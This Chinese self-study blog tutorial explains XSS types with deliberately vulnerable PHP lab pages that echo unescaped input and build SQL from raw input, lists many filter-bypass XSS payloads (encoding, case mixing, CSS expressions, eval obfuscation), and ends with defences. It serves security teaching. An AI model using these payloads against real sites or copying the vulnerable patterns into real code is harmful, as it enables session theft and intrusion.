[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,并构建了Web目录扫描器;本文将详细讲解XSS跨站脚本攻击,从原理、示例、危害到三种常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解,最后分享了如何预防XSS攻击。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的编程经验进行讲解。
作者作为网络安全的小白,分享一些自学基础教程给大家,希望你们喜欢。同时,更希望你能与我一起操作深入进步,后续也将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不容易,大神请飘过,不喜勿喷,谢谢!
下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-study
百度网盘:https://pan.baidu.com/s/1dsunH8EmOB_tlHYXXguOeA 提取码:izeb
文章目录
- 一.什么是XSS
- 1.XSS原理
- 2.XSS示例
- 3.XSS危害
- 二.XSS分类
- 1.反射型
- 2.存储型
- 3.DOM型
- 三.XSS构造及漏洞利用
- 1.XSS构造
- 2.挖掘其他XSS漏洞
- 四.如何防御XSS
- 1.输入过滤
- 2.输出编码
- 3.标签黑白名单过滤
- 4.代码实体转义
- 5.httponly防止cookie被盗取
- 五.总结
前文学习:
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
[网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记
[网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
[网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
[网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向破解
[网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
[网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
[网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
[网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
[网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一)
[网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二)
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
[网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防护
[网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池(四)
前文欣赏:
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
[渗透&攻防] 三.数据库之差异备份及Caidao利器
[渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包
参考文献的书籍和文章都比较好,他们都是网络安全大牛和大佬的成果,强烈推荐博友们阅读,也参考了较少的图片,如侵立删。
《安全之路Web渗透技术及实战案例解析》陈小兵老师
《XSS跨站脚本攻击剖析与防御》 邱永华老师
《TCP/IP协议栈详解卷一》 W.Richard Stevens
江苏君立华域公司的XSS普及PPT
2019 Python黑客编程:安全工具开发 - bilibili 白帽黑客教程
XSS(跨站脚本攻击)详解 - CSDN谢公子大佬(推荐)
Bilibili 2018小迪老师渗透专题视频 XSS跨站(推荐)
安全客 测试WAF来学习XSS姿势 - 誮訫尐羅卟老师系列
看雪论坛文章:
浅析WEB安全编程:https://bbs.pediy.com/thread-222922.htm
XSS跨站总结:https://bbs.pediy.com/thread-196518.htm
勒索病毒WannaCry深度技术分析:https://bbs.pediy.com/thread-217662.htm
Web基础设施知识及安全攻防:https://bbs.pediy.com/thread-199199.htm
内网渗透小记:https://bbs.pediy.com/thread-192778.htm
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。
一.什么是XSS
1.XSS原理
跨网站脚本(Cross-site scripting,XSS) 又称为跨站脚本攻击,是一种经常出现在Web应用程序的安全漏洞攻击,也是代码注入的一种。XSS是由于Web应用程序对用户的输入过滤不足而产生的,攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者用户可能采取Cookie窃取、会话劫持、钓鱼欺骗等各种攻击。这类攻击通常包含了HTML以及用户端脚本语言。
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、VBScript、ActiveX、 Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
漏洞成因
如下图所示,在URL中将搜索关键字设置为JS代码,执行了alert()函数。该图中,上面有一个URL,下面是一个页面返回的HTML代码,我们可以看到白色部分HTML是我们事先定义好的,黑色部分参数是用户想搜索的关键词。当我们搜索了test+Div最后等于123,后台反馈页面的搜索引擎会告诉用户搜索了什么关键词,结果如何等等。
这个地方如果没有做好转移,可能会造成XSS跨站,我们可以看到蓝色部分是我们事先定义好的结构,被攻击者利用之后它先把这个DIV结束了,最后加上一个script标签,它也有可能不跟你谈标签,直接发送到它的服务器上。参数未经过安全过滤,然后恶意脚本被放到网页中执行,用户浏览的时候就会执行了这个脚本。
该漏洞存在的主要原因为:
- 参数输入未经过安全过滤
- 恶意脚本被输出到网页
- 用户的浏览器执行了恶意脚本
2.XSS示例
作者接下来使用WAMP(Windows+Apache+MySQL+PHP)搭建PHP网站平台作,简单讲解两个常见案例。
示例1:GET提交
下面是一个简单的XSS漏洞代码(xss-01.php)。
<?phpecho "这是一个XSS漏洞攻击测试页面!<br />";$xss = $_GET['x'];echo $xss;//JS代码:<script>alert(1)</script>
?>
当输入正确的值时,网页能正常显示。
http://localhost/xss/xss-01.php?x=122
输出结果如下图所示:
而当我们输入JS脚本代码时,它会弹出相应的窗口,这就是一个XSS注入点。
http://localhost/xss/xss-01.php?x=<script>alert(1)</script>
示例2:POST提交
另一种常见的XSS上传漏洞代码如下所示:
index.html
<html><head><title>XSS测试1</title></head><body><form action='xss.php' method="get">请输入用户名:<br><input type="text" name="name" value="" /><input type="submit" name="提交" /></form></body>
</html>
xss.php
<html><head><title>测试结果</title></head><body><?phpecho $_REQUEST['name'];?></body>
</html>
输入正确的用户名如“eastmount”,仍然能正确显示。
而输入脚本代码 < script>alert(1)< /script> 时,它弹出了对应的脚本窗口,存在XSS注入漏洞。注意,这里采用的是POST方法提交数据,而前面采用的GET方法,其最主要的区别是GET方式的网址可以看到参数,而POST方式URL始终不变。
页面直接弹出了“1“”的窗口,可以看到,我们插入的语句已经被页面给执行了。这就是最基本的反射型的XSS漏洞,这种漏洞数据流向是: 前端–>后端–>前端。
3.XSS危害
XSS跨脚本攻击主要的危害如下:
- 网络钓鱼,包括盗取各类用户账号
- 窃取用户Cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作
- 劫持用户浏览器会话,从而执行任意 操作,例如进行非法转账、强制发表日志、发送电子邮件等
- 强制弹出广告页面、恶意 刷流量等
- 网站挂马,进行恶意操作,例如任意篡改页面信息、非法获取网站信息、删除文件等
- 进行大量的客户端攻击,例如DDOS攻击、传播跨站脚本蠕虫等
- 获取用户端信息 ,;例如用户的浏览记录、真实IP地址、开放的端口等
- 结合其他漏洞,如CSRF漏洞,实施进一步作恶
PS:上面涉及的很多内容,作者会进一步学习,并分享相关的内容,一起进步 ,一起加油!
二.XSS分类
XSS有部分书籍将它划分为两类——反射型和持久型。
反射型
也称为非持久型、参数型跨站脚本。这种类型的跨站脚本是最常见,也是使用最广泛的一种,主要用于恶意脚本附加到URL地址的参数中。一般出现在输入框、URL参数处。
持久型
持久型跨站脚本也可以说是存储型跨站脚本,比反射型XSS更具威胁性,并且可能影响到Web服务器自身安全。一般出现在网站的留言、评论、博客日志等于用户交互处。
而另一部分书籍将XSS分为三种类型——反射型、存储型以及DOM型,这也是本篇文章重点讲解的分类方式。
1.反射型
反射型又称为非持久型、参数型跨站脚本。这种类型的跨站脚本是最常见,也是使用最广泛的一种,主要用于恶意脚本附加到URL地址的参数中。它需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面、输入框、URL参数处。反射型XSS大多数是用来盗取用户的Cookie信息。其攻击流程如下图所示:(该图片源自谢公子文章)
下图是专门训练一些WEB漏洞的练习页面,我们可以输入自己的名字,输入之后会把我们的名字显示出来。例如我们输入了一个“张三”,这个时候弹出来了一个“123”,在那边显示了一个张三,但是script标签没有出来,因为这个标签被执行了。
示例:
这就是最基本的反射型的XSS漏洞,这种漏洞数据流向是: 前端–>后端–>前端。其代码案例如前面所述:
//前端页面 index.html
<html><head><title>XSS测试1</title></head><body><form action='xss.php' method="get">请输入用户名:<br><input type="text" name="name" value="" /><input type="submit" name="提交" /></form></body>
</html>//后端页面 xss.php
<?php$name = $_POST['name'];echo $name;
?>
当用户提交数据,输入 < script>alert(‘hack’)< /script> 代码会提交给后台,并弹出hack页面,这就表示我们的恶意语句被页面执行了。
2.存储型
存储型XSS又称为持久型跨站脚本,比反射型XSS更具威胁性,并且可能影响到Web服务器自身安全。它的代码是存储在服务器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。存储型XSS一般出现在、评论、博客日志等于用户交互处,这种XSS比较危险,容易造成蠕虫、盗窃cookie等。其攻击流程如下图所示:(该图片源自谢公子文章)
在存储型XSS中,可以看到这个URL上面并没有代码,但是依然弹出了一个“1”。它是发现个人资料页的时候有一个XSS漏洞,在个性签名的位置填入了一个XSS标签,弹出了一个“1”,把这个地址发给别人,别人看到这个地址并没有什么代码以为这个页面是安全的,结果一打开就插入了这个XSS代码。
存储型XSS的攻击危害比较大,因为它的页面当中是看不到这个Script的代码,别人防不胜防。只要管理员没有发现,下一个用户或者下一个用户一直接发它,而反射型需要用户主动点击的。
示例:
假设现在存在一个 index2.html 代码,用户提交ID和用户名并存储至数据库中。
<html><head><title>XSS测试2</title></head><body>欢迎大家阅读CSDN Eastmount的博客,一起进步,一起加油喔!<br /><form action='xss2.php' method="post">请输入用户名:<br>ID:<input type="text" name="id" value="" /> <br />Name:<input type="text" name="name" value="" /> <br /><input type="submit" name="提交" /></form></body>
</html>
后台的 xss2.php 将执行数据库存储操作,本地MySQL数据库创建一个名为 XSSDB的数据库,并插入一张XSS表,如下图所示。
xss2.php代码如下所示:
<?php//获取提交的表单值$id=$_POST["id"];$name=$_POST["name"];echo $id,'<br />';echo $name,'<br />';//连接数据库//因为PHP版本是7.3的,因此用mysqli_connect()而不是用mysql_connect()$con = mysqli_connect("localhost","root","123456", "xssdb");if (!$con) { die('Could not connect database: ' . mysqli_error()); }//插入数据表$sql = "insert into xss (id,name) values ('{$id}','{$name}');";echo $sql;$result
此时另一个页面 select.php 负责提供给其他用户访问,则可以看到我们的信息。
<?php$id = $_GET['id'];//链接数据库$con = mysqli_connect("localhost","root","123456", "xssdb");//查询数据$sql = "select * from xss where id='{$id}';";$result = mysqli_query($con, $sql);//$data = mysqli_fetch_all($result); // 从结果集中获取所有数据//print_r($data);while($row = mysqli_fetch_assoc($result)) {echo $row['name'];}
?>
当我们输入正确的值,如下图所示:
id:1
name:yangxiuzhang
此时数据库中可以看到我们插入的值。
通过本地网址(localhost:8088/xss/select.php?id=1)我们能获取id为1对应的name值。
当我们输入JS代码时,该程序又将如何运行呢?接着我们插入如下数据:
id:2
name:< script>alert(‘hack’)< /script>
注意,这里的hack的单引号要进行转义,因为sql语句中的$name是单引号的,所以这里不转义的话就会闭合sql语句中的单引号,不然注入不进去。
原理:用户提交数据到后端,后端存储至数据库中,然后当其他用户访问查询页面时,后端调出数据库中的数据,显示给另一个用户,此时的XSS代码就被执行了。
此时数据库插入的内容如下所示,可以看到JS代码已经成功插入我们的后台。
最后,我们调用 select.php (localhost:8088/xss/select.php?id=2)页面,可以看到成功执行了该脚本文件。
存储型XSS的数据流向为:前端–>后端–>数据库–>后端–>前端。
3.DOM型
首先,什么是DOM呢?
DOM是指文档对象模型,是一个平台中立和语言中立的接口,有的程序和脚本可以动态访问和更新文档的内容、结构和样式。在web开发领域的技术浪潮中,DOM是开发者能用来提升用户体验的最重要的技术之一,而且几乎所有的现在浏览器都支持DOM。
DOM本身是一个表达XML文档的标准,HTML文档从浏览器角度来说就是XML文档,有了这些技术后,就可以通过javascript轻松访问它们。下图是一个HTML源代码的DOM树结构。
其次,什么优势DOM-XSS呢?
DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,不经过后端,DOM-XSS是通过url传入参数去控制触发的,其实也属于反射型XSS。
DOM型的XSS是一些有安全意识的开发者弄出来的,比如说接受参数会做一些过滤,把一些字符转义一下,但是转义之后依然会存在着XSS的情况。常见可能触发DOM-XSS的属性包括:document.referer、window.name、location、innerHTML、documen.write等。
如下图所示,我们上面输入的可以看到这行代码规律,把这个大括号、小括号以及双页号进行转移,按理说转移之后它应该不会再作为它的标签存在,不会存在XSS的代码。
下面Script通过ID获得的这个值,复制到了这个DIV上,经过DOM操作之后,之前转义的字符就变为它的标签,所以经过DOM操作的XSS我们称之为DOMXSS。它有可能通过URL传播,也有可能通过服务器传播。
最后,DOM型跨站脚本的攻击是如何实现呢?
下面简单讲解一个DOM-XSS代码,假设前端是一个index3.html页面。
<html><head><title>DOM-XSS测试3</title></head><body>欢迎大家阅读CSDN Eastmount的博客,一起进步,一起加油喔!<br /><form action='xss3.php' method="post">请输入用户名:<br><input type="text" name="name" value="" style="width:400px" /> <br /><input type="submit" name="提交" /></form></body>
</html>
接着设置后台页面,xss3.php用于获取提交的值并显示其在页面中。注意,代码是获取username中的值,然后显示在print内,这也是导致XSS的原因。
<?php//获取提交的表单值$name=$_POST["name"];
?>
<input id="username" type="text" value="<?php echo $name; ?>"/><div id="print"><!-- 显示获取的内容 -->
</div>
<script type="text/javascript">//获取username值并输出在print内,这里是导致xss的主要原因var text = document.getElementById("username");var print = document.getElementById("print");print.innerHTML=text.value;
</script>
此时,当我们输入正常的参数,它显示的结果如下图所示,是正常显示的。
而当我们输入恶意代码的时候,比如提交 <img src=1 οnerrοr=alert(‘hack’) /> 给后台,它会执行我们的JS代码,弹出hack的窗体。从而证明了DOM-XXSS是存在的。
DOM型跨站脚本漏洞的数据流向是:前端->浏览器。
三.XSS构造及漏洞利用
1.XSS构造
在进行SQL注入中,我们可以设置相应的过滤函数防止,比如防止万能密码(‘or’='or’或admin),也能调用preg_replace()函数将特色字符过滤。同样,XSS攻击代码也可能会被过滤,如下所示,它将< script>和 < /script>进行了过滤。
<?php$name=$_POST["name"]; if($name!=null){//过滤<script>和</script>$name=preg_replace("/<script>/","",$name); $name=preg_replace("/<\/script>/","",$name); echo $name; }
?>
如何绕过这个过滤呢?这里可以通过大小写成功绕过 ,如下所示:
为了更好地理解XSS跨站脚本攻击,更好地进行防御,这里我们分享常见的绕过XSS过滤(XSS-Filter)的方法。
1) 利用<>标记注射HTML、JavaScript
通过<script>标签就能任意插入由JavaScript或VBScript编写的恶意脚本代码常用案例:<script>alert(/xss/)</script>
2) 利用HTML标签属性值执行XSS
通过javascript:[code]伪协议形式编写恶意脚本常用案例:<table background="javascript:alert(/xss/)"></table><img src="javascript:alert('xss');" >
3) 空格回车Tab绕过过滤
注意javas和cript之间的间隔不是由空格键添加的,而是用Tab键添加的。<img src="javas cript:alert(/xss/)" width=100>使用回车分隔:
<img src="javas
cript:
alert(/xss/)" width=100>
4) 对标签属性值进行转码
<img src="javascript:alert('xss');">
替换成:
<img src="javascript:alert('xss');">
其中,t的ASCII码值为116,用”t”表示,:则表示:。
再进一步替换:
<img src="javascript:alert('xss');">
5) 产生事件如click、mouseover、load等
W3C(万维网联盟)将事件分为3种不同的类别:
- 用户接口(鼠标、键盘)
- 逻辑(处理的结果)
- 变化(对文档进行修改)
<input type="button" value="click me" onclick="alert('xss')" />
<img src="#" onerror=alert(/xss/)>
6) 利用CSS跨站过滤
常见示例如下所示:
<div style="background-image:url(javascript:alert('xss'))"><style>body {background-image:url("javascript:alert(/xss/)");}
</style><div style="width:expression(alert('XSS'));"><img src="#" style="xss:expression(alert(/xss/));"><style>body {background-image: expression(alert("xss"));}
</style><div style="list-style-image:url(javascript:alert('XSS'));"><div style="background-image:url(javascript:alert('XSS'));"><img src=" javascript:alert('xss')"><style>@import 'javascript:alert(/xss/)';
</style>
7) 扰乱XSS过滤规则
一个正常的XSS输入: <img src="javascript:alert(0);">转换大小写后的XSS:<IMG SRC="javascript:alert(0);">大小写混淆的XSS:<iMg sRC="JaVasCript:alert(0);">不用双引号,而是使用单引号的XSS:<img src='javascript:alert(0);'>不适用引号的XSS:<img src=javascript:alert(0);>不需要空格的XSS:<img/src="javascript:alert('xss');">构造不同的全角字符: <div style="{left:expression(alert('xss'))">利用注释符<div style="wid/**/th:expre/*xss*/ssion(alert('xss'));">\和\0– <style>@imp\0ort 'java\0scri\pt:alert(/xss/)';</style><style> @imp\ort 'ja\0va\00sc\000ri\0000pt:alert(/xss/)';</style>CSS关键字转码<div style="xss:\65xpression(alert('XSS'));"> <div style="xss:\065xpression(alert('XSS'));"><div style="xss:\0065xpression(alert('XSS'));"><!--<img src="--><img src=x οnerrοr=alert(1)//"><comment><img src="</comment><img src=x οnerrοr=alert(1)//"> <style><img src=“</style><img src=x onerror=alert(1)//”>
8) 利用字符编码
原始语句: <img src="javascript:alert('xss');">十进制编码 <img src="javascript:alert('xss');"><img src="javascript:alert('xss');"><img src="javascript:alert('xss');">十六进制编码<img src="javascript:alert('xss');">
9) 利用字符编码eval()函数、eval()和string.fromCharCode()函数过滤
<script>eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29");</script><img src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))">
PS:由于JavaScript代码必须要写在代码块中才能显示,所以文章包含了很多代码块,望读者理解。
2.挖掘其他XSS漏洞
其他恶意攻击包括黑盒攻击测试、源代码审计、Flash XSS等。
1)黑盒攻击测试
Acunetix Web Vulnerability Scanner 是一款商业级的web漏洞扫描程序,它的功能非常强大,可以自动化检查各种web应用漏洞,包括XSS、SQL注入、代码执行、目录遍历、网站源代码暴力等。
注意:下一篇文章作者将结合AWVS详细讲解XSS跨站脚本攻击的实战案例。
黑盒攻击测试手工检测XSS代码常见用法包括:
<script>alert(/xss/)</script>
<li/οnclick=alert(xss)>a</li>
<img/src=x οnerrοr=alert(1)>
<a href=javascript:alert(2)>M
<a href=javascript:alert(13)>M
<svg/οnlοad=alert(1)>
2) 源码审计
顾名思义就是检查源代码中的安全缺陷,检查程序源代码是否存在安全隐患,或者有编码不规范的地方,通过自动化工具或者人工审查的方式,对程序源代码逐条进行检查和分析,发现这些源代码缺陷引发的安全漏洞,并提供代码修订措施和建议。
例如,PHP全局变量如下所示:
3) Flash XSS
关于Flash的跨站漏洞其实很早就出现了。Flash的安全漏洞也不仅仅只有XSS,还有CSRF、跨域、代码执行等其他安全问题。Flash中编程使用的是ActionScript脚本,Flash产生的xss问题主要有两种方式:加载第三方资源和与javascript通信引发XSS。
Flash确实存在很多漏洞,后续读者也想深入研究了解,看看能不能复现几个漏洞代码出来。同时,Flash XSS感兴趣的读者可以阅读安全脉搏大神的这篇文章:https://www.secpulse.com/archives/44299.html
四.如何防御XSS
由于XSS通常可以插入在script标签、HTML注释、标签属性名、标签属性值、标签名字、CSS等中,所以接下来我们简单讲讲如何防御XSS攻击。
1.输入过滤
输入验证就是对用户提交的信息进行有效验证,仅接受指定长度范围内的,采用适当的内容提交,阻止或者忽略除此外的其他任何数据。如下代码,检查用户输入的电话号码是否真确(数字、字母检测)。
输入正确和错误分别提示。
输入验证要根据实际情况设计,下面是一些常见的检测和过滤:
- 输入是否仅仅包含合法的字符
- 输入字符串是否超过最大长度限制
- 输入如果为数字,数字是否在指定的范围
- 输入是否符合特殊的格式要求,如E-mail地址、IP地址等
2.输出编码
大多数的Web应用程序都存在一个通病,就是会把用户输入的信息完完整整的输出在页面中,这样很容易便会产生一个XSS。HTML编码在防止XSS攻击上起到很大的作用,它主要是用对应的HTML实体编号替代字面量字符,这样做可以确保浏览器安全处理可能存在恶意字符,将其当做HTMl文档的内容而非结构加以处理。
3.标签黑白名单过滤
有时根本就不需要考虑到它是不是HTML标签,我们根本用不到HTML标签。不管是采用输入过滤还是输出过滤,都是针对数据信息进行黑/白名单式的过滤。
不同的javascript写法包括:
大小写混淆: <img src=JaVaScRiPt:alert(‘xss’)>
插入[tab]键;<img src=”jav ascript:alert(‘xss’);”>
插入回车符: <img src=”javasrcipt:alert(‘xss’);”>
使用/**/注释符:
<img src=”java/*xxx*/script:alert(‘xss’);”>重复混淆关键字: <img src=”java/*/*javascript*/script/*javascript*/*/script:alert(‘xss’);”>使用&#十六进制编码字符: <img src=”jav	ascript:alert(‘xss’);”>使用&#十进制编码字符:<img src= javascript:alert(‘xss’);”>使用&#十进制编码字符(加入大量的0000):<img src=”javascript:alert(‘xss’);”>在开头插入空格:<img src=” javascript:alert(‘xss’);”>
黑名单:
过滤可能造成危害的符号及标签,发现使用者输入参数的值为 < script>xxx< /script> 就将其取代为空白。其优点是可以允许开发某些特殊HTML标签,确实是可能因过滤不干净而使攻击者绕过规则。
白名单:
白名单仅允许执行特定格式的语法,仅允许< img scr=“http://xxx” > 格式,其余格式一律取代为空白。其优点是可允许特定输入格式的HTML标签,确实是验证程序编写难度校高,且用户可输入变化减少。
4.代码实体转义
由于只保留文字部分是一劳永逸的,有时我们还需要展示这个标签,比如说程序论坛当中要贴一个代码,这个时候我们需要用一些转义,它会把这个大括号、小括号以及双引号做一个转义,做为一个字符,就无法执行这个标签型,后面加一个参数,但有时候单引号也会造成XSS。
5.httponly防止cookie被盗取
一个信号当中有那么多的地方存在着这个输入以及检测的地方,可能就有一些地方漏掉,只要有一个地方漏掉了,用户的cookie信息就被盗取了。服务器在发送用户信息的时候,我们需要加上一个httponly,这个代码无法读取到cookie的信息,那么攻击者也是得不到这个信息,这对于用户来说也是非常好的保护。
比如说张三在我们网站上登陆了一下用户名,李四他特意发了一个攻击请求,他拿不到这个用户ID,就冒充不了这个张三。如果在Cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到Cookie信息,这样能有效的防止XSS攻击。
最重要的是:千万不要引入任何不可信的第三方JavaScript到页面里!
五.总结
希望这篇文章对你有所帮助,尤其是网络安全的初学者,作者写这篇文章加实验真的快吐了,哈哈!但只要对你们有帮助,我就很开心,后续会结合AWVS工具操作XSS攻击实战案例。这是Python网络攻防系列文章,作者也是初学者,而且是仰仗各位大牛的无私分享而写下的实战总结,希望对你们有帮助。
网络安全的视频资源确实挺贵的,作者也会继续开源免费的分享更多文章和代码,希望能帮到更多的初学者,你们的每一句感谢和祝福都激发着我前行。转眼间,1024节日要来了,我还是写一篇《我与CSDN的这十年》,分享下程序猿和程序媛的故事,纪念这十年奋斗和感动的日子。十年,说长不长,说短不短,人生进度条的八分之一,都是青春,都是热血。感谢你我的分享和坚守,也期待下一个十年。明天早起上课,下午回来写文章,加油~
2019年10月12日 晚上写于武汉
(By:Eastmount 2019-10-12 晚上10点 http://blog.csdn.net/eastmount/ )
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 用硕鼠下载土豆视频
要下载土豆视频常规作法就是在土豆网站上面下载客户端, 但是试了一下,大部分视频在客户端里面无法播放,也无法下载。 用傲游自带的资源嗅探器试了一下也不理想。 百度了一下,终于找到了一个理想的工具---硕鼠(http://www.flvcd.com/) 直接把要下载的土豆页面复制到硕鼠网…...
2024/4/18 4:59:04 - Maxthon3 助 taobao 为恶,哪个杀软能hold住?
在网上为QQ空间找背景音乐,找不到合适的资源链接,之前用过Maxthon3,其中的资源嗅探器表现8错,打算用它来获取合适的资源链接。 从网上下载了Maxthon3安装程序进行安装。文件说明符 : R:\maxthon.exe属性 : A---数字签名:Maxthon Asia LtdPE文件:是语言 : 英语(美国)文件…...
2024/4/18 2:06:01 - 国内网络安全公司介绍
国内网络安全公司简介 1. http://www.symantec.com/region/cn 赛门铁克中国一家从事网络安全服务的公司,挺供网络安全产品下载、整体网络安全解决方案。 2. http://www.nsfocus.com 绿盟科技有限公司—一家从事网络安全服务的公司,致力于网络安全技术研究、产品开发、安全…...
2024/4/13 5:44:23 - [网络安全自学篇] 十九.Powershell基础入门及常见用法(一)
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了XSS跨站脚本攻击,从原理、示例、危害到三种常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解。这篇文章将讲解Powershell…...
2024/4/13 5:45:08 - Elasticsearch Java Low Level REST Client(嗅探器)
https://segmentfault.com/a/1190000016828977?utm_source=tag-newest#articleHeader0嗅探器 允许从正在运行的Elasticsearch集群中自动发现节点并将它们设置到现有的RestClient实例的最小的库,它默认使用节点信息api检索属于集群的节点,并使用jackson解析获得的json响应。 …...
2024/4/17 5:01:11 - 集成的HTTP嗅探器HttpWatch更新至v11.0.17丨附下载
2019独角兽企业重金招聘Python工程师标准>>> HttpWatch是一款集成的HTTP嗅探器,为IE和Firefox提供新的方法以查看您网站的负载和运行情况。你可以直接在浏览器中调试由web页面生成的网络流量,而无需切换到一个单独的工具。 【HttpWatch v11.0.17免费下载>>…...
2024/4/13 5:45:13 - 网络安全思维导图(全套11张)
来自:懒小米 的BLOG链接:http://lanxiaomi.blog.51cto.com/4554767/1964958本文包含以下思维导图:● 网络安全绪论● 扫描与防御技术● 网络监听及防御技术● 口令破解及防御技术● 欺骗攻击及防御技术● 拒绝服务供给与防御技术● 缓冲区溢出攻击及防御技术● Web攻击及防御…...
2024/4/13 5:45:18 - ACM如何入门,ACM竞赛需要学习哪些算法?
先是介绍一下我的成绩。(较好的成绩都已黑体标注,其他可直接忽略)大一:2017年4月份”玲珑杯“河南工业大学2017年ACM程序设计大赛暨河南高校邀请赛,获得银奖 2017年5月12日在哈尔滨师范大学参加第十二届黑龙江省大学生程序设计竞赛,获得铜奖。 2017年6月10日在我校参加南…...
2024/4/13 5:45:18 - [网络安全自学篇] 五十.虚拟机基础之安装XP系统、文件共享、网络快照设置及Wireshark抓取BBS密码
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Procmon软件基本用法及文件进程、注册表查看,这是一款微软推荐的系统监视工具,功能非常强大可用来检测恶意软件。这篇文章将讲解虚拟机…...
2024/4/15 9:20:33 - HTTPLook - 一个HTTP的嗅探器
HTTPLook 是一个 HTTP 的嗅探器,它能捕捉本机与其它任何主机的 HTTP 通讯(不是 HTTPS 哦 ),然后显示详细的 HTTP 操作(如 GET/POST)、访问资源的 URL 、字节数大小等,这个软件简单易用,不用对 Internet Explorer 做任何其它设置(有的软件通过在 IE 中设置代理来监控数…...
2024/4/13 5:45:03 - 中国网络安全企业50强(来源自安全牛公司)
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴! 中国网络安全企业50强一、50强榜单(注:本图为矩阵图,与传统的数轴、象限图不同,本矩阵图…...
2024/4/18 16:08:24 - Android下的嗅探
很简单啊!没想到android也带了linux的tcpdump,可以直接用,哈哈转载于:https://blog.51cto.com/g0ug0u/412988...
2024/4/13 5:45:23 - 什么是电力系统安全I区,安全II,安全III区
(1)安全区I为实时控制区,凡是具有实时监控功能的 系统或其中的监控功能部分均应属于安全区I。(2)安全区II为非控制生产区,原则上不具备控制功能的生 产业务和批发交易业务系统均属于该区。(3)安全区III为生产管理区,该区的系统为进行生产管理的 系统。(4)安全区IV为管理信息…...
2024/4/13 5:44:58 - [c#]喜马拉雅FM音频批量下载器开发手记
[c#]喜马拉雅FM音频批量下载器开发手记0、序言第一次写C博,也不知道写些啥,正好近期做了一个用于喜马拉雅FM音频的批量下载器,虽然网络上之前就有,但是功能上来讲还没有满足自己需求,于是就照猫画虎弄了一个,比较懒,模仿了原作者的程序布局,希望看到了原谅则个!1、程序…...
2024/4/18 23:36:47 - 笔试题————1、网络安全、Web安全、渗透测试笔试总结
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程!本篇文章主要涉及一下几个方面:对…...
2024/4/18 9:44:54 - 网络安全:黑客攻防;黑客编程教程集合2
网络安全:黑客攻防;黑客编程教程集合2 http://u.115.com/file/f470a72dac# 黑客基地vb特训班.rar http://u.115.com/file/f4df4ccbc4#" 思成C语言系列教程.rar 网络安全的东东http://u.115.com/file/f630a4f8ed# 黑鹰0Day安全技能之完全学习.rar http://u.115.com/file/f…...
2024/4/13 5:45:13 - 关于浏览器嗅探
在前端开发中经常会遇到一系列兼容性问题,怎样精准地识别出各个浏览器的版本是一件很头痛的问题,尤其是navigator有可能被厂商伪造的情况。虽然大神们建议要针对浏览器特性来处理而不是通过浏览器版本,但是实际操作过程中却有相当大的困难。以下是大神们总结的各种浏览器嗅探…...
